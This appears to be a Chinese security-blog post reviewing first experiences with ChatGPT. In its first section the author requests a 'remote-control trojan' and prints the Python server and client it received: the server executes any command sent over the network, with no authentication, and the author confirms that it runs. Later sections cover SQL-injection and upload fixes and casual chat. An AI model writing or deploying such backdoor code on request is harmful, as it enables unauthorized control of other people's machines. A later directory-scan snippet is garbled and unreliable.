ChatGPT-初体验

admin 2023年3月12日03:17:23ChatGPT-初体验已关闭评论37 views字数 2384阅读7分56秒阅读模式

前言

ChatGPT(全名:Chat Generative Pre-trained Transformer),美国OpenAI [1] 研发的聊天机器人程序 [12] ,于2022年11月30日发布 [2-3] 。ChatGPT是人工智能技术驱动的自然语言处理工具,它能够通过理解和学习人类的语言来进行对话,还能根据聊天的上下文进行互动,真正像人类一样来聊天交流,甚至能完成撰写邮件、视频脚本文案翻译代码,写论文 [21] 等任务。

对于ChatGPT一直早有耳闻,奈何工作繁重,最近终于挤出时间来体验下,以下为初次使用体验,简单记录下,方便大家参考。

一、安全开发测试

例如,使用python3生成一个远控木马
1.尝试直接发送要求,描述比较笼统,关键字为“python3” “远控木马

ChatGPT-初体验

ChatGPT-初体验
2.给了回复,描述很清晰,不妨顺着它的思路来,师夷长技以制夷。

测试下脚本

```

!/usr/bin/env python3

import socket
import subprocess

创建一个服务器socket

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

监听接口

server_socket.bind(('0.0.0.0', 8888))
server_socket.listen(5)

while True:
# 等待客户端连接
client_socket, addr = server_socket.accept()

# 接收客户端发送的命令
command = client_socket.recv(1024).decode()

# 在服务器上执行命令
output = subprocess.getoutput(command)

# 将执行结果发送给客户端
client_socket.send(output.encode())

关闭socket

client_socket.close()
server_socket.close()
```

执行服务端脚本

ChatGPT-初体验

```

控制端

import socket

host = '127.0.0.1'
port = 8888

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
cmd = input('Please enter command: ')
s.send(cmd.encode())
data = s.recv(1024)
s.close()
print('Received:', data.decode())
```

ChatGPT-初体验

使用效果:无问题

ChatGPT-初体验

```
def scan_ls(path):
import os
import json

# 定义字典存放文件信息
file_dict = {}

# 扫描指定的目录
ls_list = os.listdir(path)
for file in ls_list:
# 拼接文件完整路径
file_path = os.path.join(path, file)
# 判断文件类型
if os.path.isfile(file_path):
file_dict

= '文件'
elif os.path.isdir(file_path):
file_dict = '文件夹'
else:
file_dict = '其他类型文件'

# 转换成json字符串
file_json = json.dumps(file_dict)
return file_json

测试

print(scan_ls('/Users/apple/Desktop'))
```

使用效果:无问题

ChatGPT-初体验

总结:基本上想要的功能都能写出来,而且基本都可以微调下正常运行,从这个角度看,大大提升了工具开发效率,且降低了开发门槛,仅需对编程简单了解自己组装即可。

二、安全知识学习测试

1.例如学习java方面的漏洞,或者其他语言类似

ChatGPT-初体验

```

```

注入点在以上代码中的 usernamepassword 参数上,如果用户提供的参数中包含 SQL 注入攻击,将会导致安全漏洞。

为了修复这个问题,应该使用预处理语句,代码如下:

String username = request.getParameter("username");
String password = request.getParameter("password");
String sql = "select * from users where username=?and password=?";
PreparedStatement stmt = conn.prepareStatement(sql);
stmt.setString(1, username);
stmt.setString(2, password);
ResultSet rs = stmt.executeQuery();

ChatGPT-初体验

```

```

要修复这个问题,可以对上传的文件进行检查,比如检查文件的MIME类型,检查文件的后缀名,并且限制文件的大小,以及增加上传文件的白名单,只允许特定的文件类型上传,以防止攻击者上传有害的文件,例如:可执行文件、PHP文件等。

ChatGPT-初体验

总结:对于一些基础的问题都可完整的回答上来,省去了大量百度谷歌的时间,很适合初学者作为一个学习工具进行相关安全知识学习。

三、简单设计和自娱自乐测试

ChatGPT-初体验
比如假设我喜欢玩辩论赛,开展活动

ChatGPT-初体验
好嘛,好的坏的都给你说了,还直接告诉我辩论结束...

也可以问些生活知识

ChatGPT-初体验

总结:可以进行一些简单的网页设计,文字游戏,一些互动,或者在无聊的时候和机器人聊天来缓解情绪或将机器人接入微信群聊来活跃气氛。

四、注册及使用体验

本次体验使用微信对接的openapi的接口,主要测试了三个部分内容:开发能力测试、知识学习能力测试、互动测试,整体上体验还不错。

ChatGPT账号注册及快速使用参考链接:
https://mp.weixin.qq.com/s/NMyhT4C6SyLxB6F0Yf-2Kw

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月12日03:17:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ChatGPT-初体验http://cn-sec.com/archives/1599590.html